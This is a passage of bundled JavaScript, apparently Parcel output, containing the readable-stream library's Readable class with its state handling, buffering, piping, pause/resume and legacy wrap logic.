/*<replacement>*/ var $9845726cca5dc7eb$var$Duplex;
/*</replacement>*/ $9845726cca5dc7eb$var$Readable.ReadableState = $9845726cca5dc7eb$var$ReadableState;

var $7etJZ = parcelRequire("7etJZ");
var $9845726cca5dc7eb$require$EE = $7etJZ.EventEmitter;
var $9845726cca5dc7eb$var$EElistenerCount = function EElistenerCount(emitter, type) {
    return emitter.listeners(type).length;
};

var $jfAlf = parcelRequire("jfAlf");

var $6ZWSX = parcelRequire("6ZWSX");
var $9845726cca5dc7eb$require$Buffer = $6ZWSX.Buffer;
var $9845726cca5dc7eb$var$OurUint8Array = (typeof $parcel$global !== "undefined" ? $parcel$global : typeof window !== "undefined" ? window : typeof self !== "undefined" ? self : {}).Uint8Array || function() {};
function $9845726cca5dc7eb$var$_uint8ArrayToBuffer(chunk) {
    return $9845726cca5dc7eb$require$Buffer.from(chunk);
}
function $9845726cca5dc7eb$var$_isUint8Array(obj) {
    return $9845726cca5dc7eb$require$Buffer.isBuffer(obj) || obj instanceof $9845726cca5dc7eb$var$OurUint8Array;
}

var $kjyEk = parcelRequire("kjyEk");
var $9845726cca5dc7eb$var$debug;
if ($kjyEk && $kjyEk.debuglog) $9845726cca5dc7eb$var$debug = $kjyEk.debuglog("stream");
else $9845726cca5dc7eb$var$debug = function debug() {};

var $bF5dL = parcelRequire("bF5dL");

var $fMCbt = parcelRequire("fMCbt");

var $04a3B = parcelRequire("04a3B");
var $9845726cca5dc7eb$var$getHighWaterMark = $04a3B.getHighWaterMark;

var $6JySE = parcelRequire("6JySE");
var $9845726cca5dc7eb$require$_require$codes = $6JySE.codes;
var $9845726cca5dc7eb$var$ERR_INVALID_ARG_TYPE = $9845726cca5dc7eb$require$_require$codes.ERR_INVALID_ARG_TYPE, $9845726cca5dc7eb$var$ERR_STREAM_PUSH_AFTER_EOF = $9845726cca5dc7eb$require$_require$codes.ERR_STREAM_PUSH_AFTER_EOF, $9845726cca5dc7eb$var$ERR_METHOD_NOT_IMPLEMENTED = $9845726cca5dc7eb$require$_require$codes.ERR_METHOD_NOT_IMPLEMENTED, $9845726cca5dc7eb$var$ERR_STREAM_UNSHIFT_AFTER_END_EVENT = $9845726cca5dc7eb$require$_require$codes.ERR_STREAM_UNSHIFT_AFTER_END_EVENT;
// Lazy loaded to improve the startup performance.
var $9845726cca5dc7eb$var$StringDecoder;
var $9845726cca5dc7eb$var$createReadableStreamAsyncIterator;
var $9845726cca5dc7eb$var$from;

(parcelRequire("dlqwk"))($9845726cca5dc7eb$var$Readable, $jfAlf);
var $9845726cca5dc7eb$var$errorOrDestroy = $fMCbt.errorOrDestroy;
var $9845726cca5dc7eb$var$kProxyEvents = [
    "error",
    "close",
    "destroy",
    "pause",
    "resume"
];
function $9845726cca5dc7eb$var$prependListener(emitter, event, fn) {
    // Sadly this is not cacheable as some libraries bundle their own
    // event emitter implementation with them.
    if (typeof emitter.prependListener === "function") return emitter.prependListener(event, fn);
    // This is a hack to make sure that our error handler is attached before any
    // userland ones.  NEVER DO THIS. This is here only because this code needs
    // to continue to work with older versions of Node.js that do not include
    // the prependListener() method. The goal is to eventually remove this hack.
    if (!emitter._events || !emitter._events[event]) emitter.on(event, fn);
    else if (Array.isArray(emitter._events[event])) emitter._events[event].unshift(fn);
    else emitter._events[event] = [
        fn,
        emitter._events[event]
    ];
}


function $9845726cca5dc7eb$var$ReadableState(options, stream, isDuplex) {
    $9845726cca5dc7eb$var$Duplex = $9845726cca5dc7eb$var$Duplex || (parcelRequire("DwJuQ"));
    options = options || {};
    // Duplex streams are both readable and writable, but share
    // the same options object.
    // However, some cases require setting options to different
    // values for the readable and the writable sides of the duplex stream.
    // These options can be provided separately as readableXXX and writableXXX.
    if (typeof isDuplex !== "boolean") isDuplex = stream instanceof $9845726cca5dc7eb$var$Duplex;
    // object stream flag. Used to make read(n) ignore n and to
    // make all the buffer merging and length checks go away
    this.objectMode = !!options.objectMode;
    if (isDuplex) this.objectMode = this.objectMode || !!options.readableObjectMode;
    // the point at which it stops calling _read() to fill the buffer
    // Note: 0 is a valid value, means "don't call _read preemptively ever"
    this.highWaterMark = $9845726cca5dc7eb$var$getHighWaterMark(this, options, "readableHighWaterMark", isDuplex);
    // A linked list is used to store data chunks instead of an array because the
    // linked list can remove elements from the beginning faster than
    // array.shift()
    this.buffer = new $bF5dL();
    this.length = 0;
    this.pipes = null;
    this.pipesCount = 0;
    this.flowing = null;
    this.ended = false;
    this.endEmitted = false;
    this.reading = false;
    // a flag to be able to tell if the event 'readable'/'data' is emitted
    // immediately, or on a later tick.  We set this to true at first, because
    // any actions that shouldn't happen until "later" should generally also
    // not happen before the first read call.
    this.sync = true;
    // whenever we return null, then we set a flag to say
    // that we're awaiting a 'readable' event emission.
    this.needReadable = false;
    this.emittedReadable = false;
    this.readableListening = false;
    this.resumeScheduled = false;
    this.paused = true;
    // Should close be emitted on destroy. Defaults to true.
    this.emitClose = options.emitClose !== false;
    // Should .destroy() be called after 'end' (and potentially 'finish')
    this.autoDestroy = !!options.autoDestroy;
    // has it been destroyed
    this.destroyed = false;
    // Crypto is kind of old and crusty.  Historically, its default string
    // encoding is 'binary' so we have to make this configurable.
    // Everything else in the universe uses 'utf8', though.
    this.defaultEncoding = options.defaultEncoding || "utf8";
    // the number of writers that are awaiting a drain event in .pipe()s
    this.awaitDrain = 0;
    // if true, a maybeReadMore has been scheduled
    this.readingMore = false;
    this.decoder = null;
    this.encoding = null;
    if (options.encoding) {
        if (!$9845726cca5dc7eb$var$StringDecoder) $9845726cca5dc7eb$var$StringDecoder = (parcelRequire("eNRCS")).StringDecoder;
        this.decoder = new $9845726cca5dc7eb$var$StringDecoder(options.encoding);
        this.encoding = options.encoding;
    }
}

function $9845726cca5dc7eb$var$Readable(options) {
    $9845726cca5dc7eb$var$Duplex = $9845726cca5dc7eb$var$Duplex || (parcelRequire("DwJuQ"));
    if (!(this instanceof $9845726cca5dc7eb$var$Readable)) return new $9845726cca5dc7eb$var$Readable(options);
    // Checking for a Stream.Duplex instance is faster here instead of inside
    // the ReadableState constructor, at least with V8 6.5
    var isDuplex = this instanceof $9845726cca5dc7eb$var$Duplex;
    this._readableState = new $9845726cca5dc7eb$var$ReadableState(options, this, isDuplex);
    // legacy
    this.readable = true;
    if (options) {
        if (typeof options.read === "function") this._read = options.read;
        if (typeof options.destroy === "function") this._destroy = options.destroy;
    }
    $jfAlf.call(this);
}
Object.defineProperty($9845726cca5dc7eb$var$Readable.prototype, "destroyed", {
    // making it explicit this property is not enumerable
    // because otherwise some prototype manipulation in
    // userland will fail
    enumerable: false,
    get: function get() {
        if (this._readableState === undefined) return false;
        return this._readableState.destroyed;
    },
    set: function set(value) {
        // we ignore the value if the stream
        // has not been initialized yet
        if (!this._readableState) return;
        // backward compatibility, the user is explicitly
        // managing destroyed
        this._readableState.destroyed = value;
    }
});
$9845726cca5dc7eb$var$Readable.prototype.destroy = $fMCbt.destroy;
$9845726cca5dc7eb$var$Readable.prototype._undestroy = $fMCbt.undestroy;
$9845726cca5dc7eb$var$Readable.prototype._destroy = function(err, cb) {
    cb(err);
};
// Manually shove something into the read() buffer.
// This returns true if the highWaterMark has not been hit yet,
// similar to how Writable.write() returns true if you should
// write() some more.
$9845726cca5dc7eb$var$Readable.prototype.push = function(chunk, encoding) {
    var state = this._readableState;
    var skipChunkCheck;
    if (!state.objectMode) {
        if (typeof chunk === "string") {
            encoding = encoding || state.defaultEncoding;
            if (encoding !== state.encoding) {
                chunk = $9845726cca5dc7eb$require$Buffer.from(chunk, encoding);
                encoding = "";
            }
            skipChunkCheck = true;
        }
    } else skipChunkCheck = true;
    return $9845726cca5dc7eb$var$readableAddChunk(this, chunk, encoding, false, skipChunkCheck);
};
// Unshift should *always* be something directly out of read()
$9845726cca5dc7eb$var$Readable.prototype.unshift = function(chunk) {
    return $9845726cca5dc7eb$var$readableAddChunk(this, chunk, null, true, false);
};
function $9845726cca5dc7eb$var$readableAddChunk(stream, chunk, encoding, addToFront, skipChunkCheck) {
    $9845726cca5dc7eb$var$debug("readableAddChunk", chunk);
    var state = stream._readableState;
    if (chunk === null) {
        state.reading = false;
        $9845726cca5dc7eb$var$onEofChunk(stream, state);
    } else {
        var er;
        if (!skipChunkCheck) er = $9845726cca5dc7eb$var$chunkInvalid(state, chunk);
        if (er) $9845726cca5dc7eb$var$errorOrDestroy(stream, er);
        else if (state.objectMode || chunk && chunk.length > 0) {
            if (typeof chunk !== "string" && !state.objectMode && Object.getPrototypeOf(chunk) !== $9845726cca5dc7eb$require$Buffer.prototype) chunk = $9845726cca5dc7eb$var$_uint8ArrayToBuffer(chunk);
            if (addToFront) {
                if (state.endEmitted) $9845726cca5dc7eb$var$errorOrDestroy(stream, new $9845726cca5dc7eb$var$ERR_STREAM_UNSHIFT_AFTER_END_EVENT());
                else $9845726cca5dc7eb$var$addChunk(stream, state, chunk, true);
            } else if (state.ended) $9845726cca5dc7eb$var$errorOrDestroy(stream, new $9845726cca5dc7eb$var$ERR_STREAM_PUSH_AFTER_EOF());
            else if (state.destroyed) return false;
            else {
                state.reading = false;
                if (state.decoder && !encoding) {
                    chunk = state.decoder.write(chunk);
                    if (state.objectMode || chunk.length !== 0) $9845726cca5dc7eb$var$addChunk(stream, state, chunk, false);
                    else $9845726cca5dc7eb$var$maybeReadMore(stream, state);
                } else $9845726cca5dc7eb$var$addChunk(stream, state, chunk, false);
            }
        } else if (!addToFront) {
            state.reading = false;
            $9845726cca5dc7eb$var$maybeReadMore(stream, state);
        }
    }
    // We can push more data if we are below the highWaterMark.
    // Also, if we have no data yet, we can stand some more bytes.
    // This is to work around cases where hwm=0, such as the repl.
    return !state.ended && (state.length < state.highWaterMark || state.length === 0);
}
function $9845726cca5dc7eb$var$addChunk(stream, state, chunk, addToFront) {
    if (state.flowing && state.length === 0 && !state.sync) {
        state.awaitDrain = 0;
        stream.emit("data", chunk);
    } else {
        // update the buffer info.
        state.length += state.objectMode ? 1 : chunk.length;
        if (addToFront) state.buffer.unshift(chunk);
        else state.buffer.push(chunk);
        if (state.needReadable) $9845726cca5dc7eb$var$emitReadable(stream);
    }
    $9845726cca5dc7eb$var$maybeReadMore(stream, state);
}
function $9845726cca5dc7eb$var$chunkInvalid(state, chunk) {
    var er;
    if (!$9845726cca5dc7eb$var$_isUint8Array(chunk) && typeof chunk !== "string" && chunk !== undefined && !state.objectMode) er = new $9845726cca5dc7eb$var$ERR_INVALID_ARG_TYPE("chunk", [
        "string",
        "Buffer",
        "Uint8Array"
    ], chunk);
    return er;
}
$9845726cca5dc7eb$var$Readable.prototype.isPaused = function() {
    return this._readableState.flowing === false;
};

// backwards compatibility.
$9845726cca5dc7eb$var$Readable.prototype.setEncoding = function(enc) {
    if (!$9845726cca5dc7eb$var$StringDecoder) $9845726cca5dc7eb$var$StringDecoder = (parcelRequire("eNRCS")).StringDecoder;
    var decoder = new $9845726cca5dc7eb$var$StringDecoder(enc);
    this._readableState.decoder = decoder;
    // If setEncoding(null), decoder.encoding equals utf8
    this._readableState.encoding = this._readableState.decoder.encoding;
    // Iterate over current buffer to convert already stored Buffers:
    var p = this._readableState.buffer.head;
    var content = "";
    while(p !== null){
        content += decoder.write(p.data);
        p = p.next;
    }
    this._readableState.buffer.clear();
    if (content !== "") this._readableState.buffer.push(content);
    this._readableState.length = content.length;
    return this;
};
// Don't raise the hwm > 1GB
var $9845726cca5dc7eb$var$MAX_HWM = 0x40000000;
function $9845726cca5dc7eb$var$computeNewHighWaterMark(n) {
    if (n >= $9845726cca5dc7eb$var$MAX_HWM) // TODO(ronag): Throw ERR_VALUE_OUT_OF_RANGE.
    n = $9845726cca5dc7eb$var$MAX_HWM;
    else {
        // Get the next highest power of 2 to prevent increasing hwm excessively in
        // tiny amounts
        n--;
        n |= n >>> 1;
        n |= n >>> 2;
        n |= n >>> 4;
        n |= n >>> 8;
        n |= n >>> 16;
        n++;
    }
    return n;
}
// This function is designed to be inlinable, so please take care when making
// changes to the function body.
function $9845726cca5dc7eb$var$howMuchToRead(n, state) {
    if (n <= 0 || state.length === 0 && state.ended) return 0;
    if (state.objectMode) return 1;
    if (n !== n) {
        // Only flow one buffer at a time
        if (state.flowing && state.length) return state.buffer.head.data.length;
        else return state.length;
    }
    // If we're asking for more than the current hwm, then raise the hwm.
    if (n > state.highWaterMark) state.highWaterMark = $9845726cca5dc7eb$var$computeNewHighWaterMark(n);
    if (n <= state.length) return n;
    // Don't have enough
    if (!state.ended) {
        state.needReadable = true;
        return 0;
    }
    return state.length;
}
// you can override either this method, or the async _read(n) below.
$9845726cca5dc7eb$var$Readable.prototype.read = function(n) {
    $9845726cca5dc7eb$var$debug("read", n);
    n = parseInt(n, 10);
    var state = this._readableState;
    var nOrig = n;
    if (n !== 0) state.emittedReadable = false;
    // if we're doing read(0) to trigger a readable event, but we
    // already have a bunch of data in the buffer, then just trigger
    // the 'readable' event and move on.
    if (n === 0 && state.needReadable && ((state.highWaterMark !== 0 ? state.length >= state.highWaterMark : state.length > 0) || state.ended)) {
        $9845726cca5dc7eb$var$debug("read: emitReadable", state.length, state.ended);
        if (state.length === 0 && state.ended) $9845726cca5dc7eb$var$endReadable(this);
        else $9845726cca5dc7eb$var$emitReadable(this);
        return null;
    }
    n = $9845726cca5dc7eb$var$howMuchToRead(n, state);
    // if we've ended, and we're now clear, then finish it up.
    if (n === 0 && state.ended) {
        if (state.length === 0) $9845726cca5dc7eb$var$endReadable(this);
        return null;
    }
    // All the actual chunk generation logic needs to be
    // *below* the call to _read.  The reason is that in certain
    // synthetic stream cases, such as passthrough streams, _read
    // may be a completely synchronous operation which may change
    // the state of the read buffer, providing enough data when
    // before there was *not* enough.
    //
    // So, the steps are:
    // 1. Figure out what the state of things will be after we do
    // a read from the buffer.
    //
    // 2. If that resulting state will trigger a _read, then call _read.
    // Note that this may be asynchronous, or synchronous.  Yes, it is
    // deeply ugly to write APIs this way, but that still doesn't mean
    // that the Readable class should behave improperly, as streams are
    // designed to be sync/async agnostic.
    // Take note if the _read call is sync or async (ie, if the read call
    // has returned yet), so that we know whether or not it's safe to emit
    // 'readable' etc.
    //
    // 3. Actually pull the requested chunks out of the buffer and return.
    // if we need a readable event, then we need to do some reading.
    var doRead = state.needReadable;
    $9845726cca5dc7eb$var$debug("need readable", doRead);
    // if we currently have less than the highWaterMark, then also read some
    if (state.length === 0 || state.length - n < state.highWaterMark) {
        doRead = true;
        $9845726cca5dc7eb$var$debug("length less than watermark", doRead);
    }
    // however, if we've ended, then there's no point, and if we're already
    // reading, then it's unnecessary.
    if (state.ended || state.reading) {
        doRead = false;
        $9845726cca5dc7eb$var$debug("reading or ended", doRead);
    } else if (doRead) {
        $9845726cca5dc7eb$var$debug("do read");
        state.reading = true;
        state.sync = true;
        // if the length is currently zero, then we *need* a readable event.
        if (state.length === 0) state.needReadable = true;
        // call internal read method
        this._read(state.highWaterMark);
        state.sync = false;
        // If _read pushed data synchronously, then `reading` will be false,
        // and we need to re-evaluate how much data we can return to the user.
        if (!state.reading) n = $9845726cca5dc7eb$var$howMuchToRead(nOrig, state);
    }
    var ret;
    if (n > 0) ret = $9845726cca5dc7eb$var$fromList(n, state);
    else ret = null;
    if (ret === null) {
        state.needReadable = state.length <= state.highWaterMark;
        n = 0;
    } else {
        state.length -= n;
        state.awaitDrain = 0;
    }
    if (state.length === 0) {
        // If we have nothing in the buffer, then we want to know
        // as soon as we *do* get something into the buffer.
        if (!state.ended) state.needReadable = true;
        // If we tried to read() past the EOF, then emit end on the next tick.
        if (nOrig !== n && state.ended) $9845726cca5dc7eb$var$endReadable(this);
    }
    if (ret !== null) this.emit("data", ret);
    return ret;
};
function $9845726cca5dc7eb$var$onEofChunk(stream, state) {
    $9845726cca5dc7eb$var$debug("onEofChunk");
    if (state.ended) return;
    if (state.decoder) {
        var chunk = state.decoder.end();
        if (chunk && chunk.length) {
            state.buffer.push(chunk);
            state.length += state.objectMode ? 1 : chunk.length;
        }
    }
    state.ended = true;
    if (state.sync) // if we are sync, wait until next tick to emit the data.
    // Otherwise we risk emitting data in the flow()
    // the readable code triggers during a read() call
    $9845726cca5dc7eb$var$emitReadable(stream);
    else {
        // emit 'readable' now to make sure it gets picked up.
        state.needReadable = false;
        if (!state.emittedReadable) {
            state.emittedReadable = true;
            $9845726cca5dc7eb$var$emitReadable_(stream);
        }
    }
}
// Don't emit readable right away in sync mode, because this can trigger
// another read() call => stack overflow.  This way, it might trigger
// a nextTick recursion warning, but that's not so bad.
function $9845726cca5dc7eb$var$emitReadable(stream) {
    var state = stream._readableState;
    $9845726cca5dc7eb$var$debug("emitReadable", state.needReadable, state.emittedReadable);
    state.needReadable = false;
    if (!state.emittedReadable) {
        $9845726cca5dc7eb$var$debug("emitReadable", state.flowing);
        state.emittedReadable = true;
        $hPtJY.nextTick($9845726cca5dc7eb$var$emitReadable_, stream);
    }
}
function $9845726cca5dc7eb$var$emitReadable_(stream) {
    var state = stream._readableState;
    $9845726cca5dc7eb$var$debug("emitReadable_", state.destroyed, state.length, state.ended);
    if (!state.destroyed && (state.length || state.ended)) {
        stream.emit("readable");
        state.emittedReadable = false;
    }
    // The stream needs another readable event if
    // 1. It is not flowing, as the flow mechanism will take
    //    care of it.
    // 2. It is not ended.
    // 3. It is below the highWaterMark, so we can schedule
    //    another readable later.
    state.needReadable = !state.flowing && !state.ended && state.length <= state.highWaterMark;
    $9845726cca5dc7eb$var$flow(stream);
}
// at this point, the user has presumably seen the 'readable' event,
// and called read() to consume some data.  that may have triggered
// in turn another _read(n) call, in which case reading = true if
// it's in progress.
// However, if we're not ended, or reading, and the length < hwm,
// then go ahead and try to read some more preemptively.
function $9845726cca5dc7eb$var$maybeReadMore(stream, state) {
    if (!state.readingMore) {
        state.readingMore = true;
        $hPtJY.nextTick($9845726cca5dc7eb$var$maybeReadMore_, stream, state);
    }
}
function $9845726cca5dc7eb$var$maybeReadMore_(stream, state) {
    // Attempt to read more data if we should.
    //
    // The conditions for reading more data are (one of):
    // - Not enough data buffered (state.length < state.highWaterMark). The loop
    //   is responsible for filling the buffer with enough data if such data
    //   is available. If highWaterMark is 0 and we are not in the flowing mode
    //   we should _not_ attempt to buffer any extra data. We'll get more data
    //   when the stream consumer calls read() instead.
    // - No data in the buffer, and the stream is in flowing mode. In this mode
    //   the loop below is responsible for ensuring read() is called. Failing to
    //   call read here would abort the flow and there's no other mechanism for
    //   continuing the flow if the stream consumer has just subscribed to the
    //   'data' event.
    //
    // In addition to the above conditions to keep reading data, the following
    // conditions prevent the data from being read:
    // - The stream has ended (state.ended).
    // - There is already a pending 'read' operation (state.reading). This is a
    //   case where the the stream has called the implementation defined _read()
    //   method, but they are processing the call asynchronously and have _not_
    //   called push() with new data. In this case we skip performing more
    //   read()s. The execution ends in this method again after the _read() ends
    //   up calling push() with more data.
    while(!state.reading && !state.ended && (state.length < state.highWaterMark || state.flowing && state.length === 0)){
        var len = state.length;
        $9845726cca5dc7eb$var$debug("maybeReadMore read 0");
        stream.read(0);
        if (len === state.length) break;
    }
    state.readingMore = false;
}
// abstract method.  to be overridden in specific implementation classes.
// call cb(er, data) where data is <= n in length.
// for virtual (non-string, non-buffer) streams, "length" is somewhat
// arbitrary, and perhaps not very meaningful.
$9845726cca5dc7eb$var$Readable.prototype._read = function(n) {
    $9845726cca5dc7eb$var$errorOrDestroy(this, new $9845726cca5dc7eb$var$ERR_METHOD_NOT_IMPLEMENTED("_read()"));
};
$9845726cca5dc7eb$var$Readable.prototype.pipe = function(dest, pipeOpts) {
    var src = this;
    var state = this._readableState;
    switch(state.pipesCount){
        case 0:
            state.pipes = dest;
            break;
        case 1:
            state.pipes = [
                state.pipes,
                dest
            ];
            break;
        default:
            state.pipes.push(dest);
            break;
    }
    state.pipesCount += 1;
    $9845726cca5dc7eb$var$debug("pipe count=%d opts=%j", state.pipesCount, pipeOpts);
    var doEnd = (!pipeOpts || pipeOpts.end !== false) && dest !== $hPtJY.stdout && dest !== $hPtJY.stderr;
    var endFn = doEnd ? onend : unpipe;
    if (state.endEmitted) $hPtJY.nextTick(endFn);
    else src.once("end", endFn);
    dest.on("unpipe", onunpipe);
    function onunpipe(readable, unpipeInfo) {
        $9845726cca5dc7eb$var$debug("onunpipe");
        if (readable === src) {
            if (unpipeInfo && unpipeInfo.hasUnpiped === false) {
                unpipeInfo.hasUnpiped = true;
                cleanup();
            }
        }
    }
    function onend() {
        $9845726cca5dc7eb$var$debug("onend");
        dest.end();
    }
    // when the dest drains, it reduces the awaitDrain counter
    // on the source.  This would be more elegant with a .once()
    // handler in flow(), but adding and removing repeatedly is
    // too slow.
    var ondrain = $9845726cca5dc7eb$var$pipeOnDrain(src);
    dest.on("drain", ondrain);
    var cleanedUp = false;
    function cleanup() {
        $9845726cca5dc7eb$var$debug("cleanup");
        // cleanup event handlers once the pipe is broken
        dest.removeListener("close", onclose);
        dest.removeListener("finish", onfinish);
        dest.removeListener("drain", ondrain);
        dest.removeListener("error", onerror);
        dest.removeListener("unpipe", onunpipe);
        src.removeListener("end", onend);
        src.removeListener("end", unpipe);
        src.removeListener("data", ondata);
        cleanedUp = true;
        // if the reader is waiting for a drain event from this
        // specific writer, then it would cause it to never start
        // flowing again.
        // So, if this is awaiting a drain, then we just call it now.
        // If we don't know, then assume that we are waiting for one.
        if (state.awaitDrain && (!dest._writableState || dest._writableState.needDrain)) ondrain();
    }
    src.on("data", ondata);
    function ondata(chunk) {
        $9845726cca5dc7eb$var$debug("ondata");
        var ret = dest.write(chunk);
        $9845726cca5dc7eb$var$debug("dest.write", ret);
        if (ret === false) {
            // If the user unpiped during `dest.write()`, it is possible
            // to get stuck in a permanently paused state if that write
            // also returned false.
            // => Check whether `dest` is still a piping destination.
            if ((state.pipesCount === 1 && state.pipes === dest || state.pipesCount > 1 && $9845726cca5dc7eb$var$indexOf(state.pipes, dest) !== -1) && !cleanedUp) {
                $9845726cca5dc7eb$var$debug("false write response, pause", state.awaitDrain);
                state.awaitDrain++;
            }
            src.pause();
        }
    }
    // if the dest has an error, then stop piping into it.
    // however, don't suppress the throwing behavior for this.
    function onerror(er) {
        $9845726cca5dc7eb$var$debug("onerror", er);
        unpipe();
        dest.removeListener("error", onerror);
        if ($9845726cca5dc7eb$var$EElistenerCount(dest, "error") === 0) $9845726cca5dc7eb$var$errorOrDestroy(dest, er);
    }
    // Make sure our error handler is attached before userland ones.
    $9845726cca5dc7eb$var$prependListener(dest, "error", onerror);
    // Both close and finish should trigger unpipe, but only once.
    function onclose() {
        dest.removeListener("finish", onfinish);
        unpipe();
    }
    dest.once("close", onclose);
    function onfinish() {
        $9845726cca5dc7eb$var$debug("onfinish");
        dest.removeListener("close", onclose);
        unpipe();
    }
    dest.once("finish", onfinish);
    function unpipe() {
        $9845726cca5dc7eb$var$debug("unpipe");
        src.unpipe(dest);
    }
    // tell the dest that it's being piped to
    dest.emit("pipe", src);
    // start the flow if it hasn't been started already.
    if (!state.flowing) {
        $9845726cca5dc7eb$var$debug("pipe resume");
        src.resume();
    }
    return dest;
};
function $9845726cca5dc7eb$var$pipeOnDrain(src) {
    return function pipeOnDrainFunctionResult() {
        var state = src._readableState;
        $9845726cca5dc7eb$var$debug("pipeOnDrain", state.awaitDrain);
        if (state.awaitDrain) state.awaitDrain--;
        if (state.awaitDrain === 0 && $9845726cca5dc7eb$var$EElistenerCount(src, "data")) {
            state.flowing = true;
            $9845726cca5dc7eb$var$flow(src);
        }
    };
}
$9845726cca5dc7eb$var$Readable.prototype.unpipe = function(dest) {
    var state = this._readableState;
    var unpipeInfo = {
        hasUnpiped: false
    };
    // if we're not piping anywhere, then do nothing.
    if (state.pipesCount === 0) return this;
    // just one destination.  most common case.
    if (state.pipesCount === 1) {
        // passed in one, but it's not the right one.
        if (dest && dest !== state.pipes) return this;
        if (!dest) dest = state.pipes;
        // got a match.
        state.pipes = null;
        state.pipesCount = 0;
        state.flowing = false;
        if (dest) dest.emit("unpipe", this, unpipeInfo);
        return this;
    }
    // slow case. multiple pipe destinations.
    if (!dest) {
        // remove all.
        var dests = state.pipes;
        var len = state.pipesCount;
        state.pipes = null;
        state.pipesCount = 0;
        state.flowing = false;
        for(var i = 0; i < len; i++)dests[i].emit("unpipe", this, {
            hasUnpiped: false
        });
        return this;
    }
    // try to find the right one.
    var index = $9845726cca5dc7eb$var$indexOf(state.pipes, dest);
    if (index === -1) return this;
    state.pipes.splice(index, 1);
    state.pipesCount -= 1;
    if (state.pipesCount === 1) state.pipes = state.pipes[0];
    dest.emit("unpipe", this, unpipeInfo);
    return this;
};
// set up data events if they are asked for
// Ensure readable listeners eventually get something
$9845726cca5dc7eb$var$Readable.prototype.on = function(ev, fn) {
    var res = $jfAlf.prototype.on.call(this, ev, fn);
    var state = this._readableState;
    if (ev === "data") {
        // update readableListening so that resume() may be a no-op
        // a few lines down. This is needed to support once('readable').
        state.readableListening = this.listenerCount("readable") > 0;
        // Try start flowing on next tick if stream isn't explicitly paused
        if (state.flowing !== false) this.resume();
    } else if (ev === "readable") {
        if (!state.endEmitted && !state.readableListening) {
            state.readableListening = state.needReadable = true;
            state.flowing = false;
            state.emittedReadable = false;
            $9845726cca5dc7eb$var$debug("on readable", state.length, state.reading);
            if (state.length) $9845726cca5dc7eb$var$emitReadable(this);
            else if (!state.reading) $hPtJY.nextTick($9845726cca5dc7eb$var$nReadingNextTick, this);
        }
    }
    return res;
};
$9845726cca5dc7eb$var$Readable.prototype.addListener = $9845726cca5dc7eb$var$Readable.prototype.on;
$9845726cca5dc7eb$var$Readable.prototype.removeListener = function(ev, fn) {
    var res = $jfAlf.prototype.removeListener.call(this, ev, fn);
    if (ev === "readable") // We need to check if there is someone still listening to
    // readable and reset the state. However this needs to happen
    // after readable has been emitted but before I/O (nextTick) to
    // support once('readable', fn) cycles. This means that calling
    // resume within the same tick will have no
    // effect.
    $hPtJY.nextTick($9845726cca5dc7eb$var$updateReadableListening, this);
    return res;
};
$9845726cca5dc7eb$var$Readable.prototype.removeAllListeners = function(ev) {
    var res = $jfAlf.prototype.removeAllListeners.apply(this, arguments);
    if (ev === "readable" || ev === undefined) // We need to check if there is someone still listening to
    // readable and reset the state. However this needs to happen
    // after readable has been emitted but before I/O (nextTick) to
    // support once('readable', fn) cycles. This means that calling
    // resume within the same tick will have no
    // effect.
    $hPtJY.nextTick($9845726cca5dc7eb$var$updateReadableListening, this);
    return res;
};
function $9845726cca5dc7eb$var$updateReadableListening(self1) {
    var state = self1._readableState;
    state.readableListening = self1.listenerCount("readable") > 0;
    if (state.resumeScheduled && !state.paused) // flowing needs to be set to true now, otherwise
    // the upcoming resume will not flow.
    state.flowing = true;
    else if (self1.listenerCount("data") > 0) self1.resume();
}
function $9845726cca5dc7eb$var$nReadingNextTick(self1) {
    $9845726cca5dc7eb$var$debug("readable nexttick read 0");
    self1.read(0);
}
// pause() and resume() are remnants of the legacy readable stream API
// If the user uses them, then switch into old mode.
$9845726cca5dc7eb$var$Readable.prototype.resume = function() {
    var state = this._readableState;
    if (!state.flowing) {
        $9845726cca5dc7eb$var$debug("resume");
        // we flow only if there is no one listening
        // for readable, but we still have to call
        // resume()
        state.flowing = !state.readableListening;
        $9845726cca5dc7eb$var$resume(this, state);
    }
    state.paused = false;
    return this;
};
function $9845726cca5dc7eb$var$resume(stream, state) {
    if (!state.resumeScheduled) {
        state.resumeScheduled = true;
        $hPtJY.nextTick($9845726cca5dc7eb$var$resume_, stream, state);
    }
}
function $9845726cca5dc7eb$var$resume_(stream, state) {
    $9845726cca5dc7eb$var$debug("resume", state.reading);
    if (!state.reading) stream.read(0);
    state.resumeScheduled = false;
    stream.emit("resume");
    $9845726cca5dc7eb$var$flow(stream);
    if (state.flowing && !state.reading) stream.read(0);
}
$9845726cca5dc7eb$var$Readable.prototype.pause = function() {
    $9845726cca5dc7eb$var$debug("call pause flowing=%j", this._readableState.flowing);
    if (this._readableState.flowing !== false) {
        $9845726cca5dc7eb$var$debug("pause");
        this._readableState.flowing = false;
        this.emit("pause");
    }
    this._readableState.paused = true;
    return this;
};
function $9845726cca5dc7eb$var$flow(stream) {
    var state = stream._readableState;
    $9845726cca5dc7eb$var$debug("flow", state.flowing);
    while(state.flowing && stream.read() !== null);
}
// wrap an old-style stream as the async data source.
// This is *not* part of the readable stream interface.
// It is an ugly unfortunate mess of history.
$9845726cca5dc7eb$var$Readable.prototype.wrap = function(stream) {
    var _this = this;
    var state = this._readableState;
    var paused = false;
    stream.on("end", function() {
        $9845726cca5dc7eb$var$debug("wrapped end");
        if (state.decoder && !state.ended) {
            var chunk = state.decoder.end();
            if (chunk && chunk.length) _this.push(chunk);
        }
        _this.push(null);
    });
    stream.on("data", function(chunk) {
        $9845726cca5dc7eb$var$debug("wrapped data");
        if (state.decoder) chunk = state.decoder.write(chunk);
        // don't skip over falsy values in objectMode
        if (state.objectMode && (chunk === null || chunk === undefined)) return;
        else if (!state.objectMode && (!chunk || !chunk.length)) return;
        var ret = _this.push(chunk);
        if (!ret) {
            paused = true;
            stream.pause();
        }
    });
    // proxy all the other methods.
    // important when wrapping filters and duplexes.
    for(var i in stream)if (this[i] === undefined && typeof stream[i] === "function") this[i] = function methodWrap(method) {
        return function methodWrapReturnFunction() {
            return stream[method].apply(stream, arguments);
        };
    }(i);
    // proxy certain important events.
    for(var n = 0; n < $9845726cca5dc7eb$var$kProxyEvents.length; n++)stream.on($9845726cca5dc7eb$var$kProxyEvents[n], this.emit.bind(this, $9845726cca5dc7eb$var$kProxyEvents[n]));
    // when we try to consume some more bytes, simply unpause the
    // underlying stream.
    this._read = function(n) {
        $9845726cca5dc7eb$var$debug("wrapped _read", n);
        if (paused) {
            paused = false;
            stream.resume();
        }
    };
    return this;
};

